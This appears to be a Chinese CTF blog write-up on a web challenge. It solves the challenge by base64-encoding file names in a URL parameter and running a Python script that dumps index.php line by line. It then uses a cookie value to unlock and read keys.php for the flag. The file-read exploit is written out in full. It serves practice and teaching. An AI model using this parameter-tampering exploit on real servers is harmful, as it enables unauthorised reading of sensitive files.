本文介绍了一种通过将目标文件名转换为Base64编码并利用特定URL参数来绕过应用程序文件读取限制的方法。通过构造特定的URL请求并使用PHP脚本逐行读取文件,成功获取了敏感文件内容。
url上有base64,解密得到filename=key.txt
index.php用base64加密
同样方法,把加密后的字符串,放到filename的参数中,回车
查看源代码,发现
<?php猜测 url中
line参数可能控制了,每次读取的行数
简单测试一下 line=1
返回error_reporting(0);
写个脚本,自己手动慢慢一行一行出来也行
import requests
s=requests.session()
url='http://120.24.86.145:8002/web11/index.php'
for i in range(0,30):
payload={'line':i,'filename':'aW5kZXgucGhw'}
a=s.get(url,params=payload).content
a=a.decode('utf-8')
print(a)简单整理一下跑出来的代码
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
很清楚了,这里构造keys.php的base64 作为filename的参数
再添加cookie,margin=margin 来读取keys.php的内容
用bp抓包
修改参数
得到flag
扫一扫
1212
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
